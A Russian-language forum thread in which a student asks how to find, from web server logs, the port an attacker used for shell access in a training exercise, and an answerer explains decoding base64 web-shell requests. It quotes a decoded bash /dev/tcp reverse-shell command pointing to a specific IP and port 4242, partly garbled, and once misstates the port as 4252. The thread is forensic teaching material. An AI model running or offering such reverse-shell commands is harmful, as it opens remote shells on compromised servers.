Как определить с какого порта происходит несанкционированный доступ по логам?

Question

[Валентин Бируля]

Текст задания:
В результате кибератаки на сайт организации нарушителю удалось загрузить в папку downloads файл, позволяющий исполнять произвольный код на сервере с привилегией процесса Web-сервера. Затем, используя загруженный ранее файл, исполнив ряд команд, нарушитель получил доступ над оболочкой сервера. Определите номер использованного для получения доступа порта. Ответ запишите в виде натурального числа.

Логи:



Правильный ответ 4242, хотя я такой цифры вообще в этих логах не нашел...

Comments

[Drno]

Либо в задании не хватает данных, либо это порт веб сервера

[Модератор]

Логи надо приводить в виде текста. Скриншоты фрагментов кода запрещены, логи сюда тоже относятся.

[Валентин Бируля]

Модератор, в задание они тоже были картинкой :(

[Модератор]

Валентин Бируля, ясно. Вообще, задания тут не приветствуются в принципе. Но вопрос, ИМХО, любопытный, поэтому оставим как есть.

Answer 1

[Владимир Коротенко]

смотрите за адресом
176.59.41.128
Первый запрос загрузка эксплоита расшифруйте онлайн энкодером base64 строку
Второй запрос /downloads/sys.php?cmd=
После равно идет строка, видимо тоже в base64 расшифруйте там будет что то типа
./shell.sh s4242

Как я и предполагал получилось следующее
https://www.base64decode.org/
скрин нечеткий поэтому появился иероглиф, но как видим четко виден адрес и порт, собственно адрес атакуещего, а порт как видите 4252 плюс перенаправление потоков ввода вывода
/in/bash -l >P/dev葉cp/176.59.41.128/4242 0<&1 2>&1

Comments

[Валентин Бируля]

Впечатляет...

Спасибо большое, за ответ теперь понятно как это вообще работает :)

Вместо иероглифа там:
dev/tcp/176

[Владимир Коротенко]

Валентин Бируля, Элементарно Ватсон, просто вы не не вспомнили как эта дребедень работает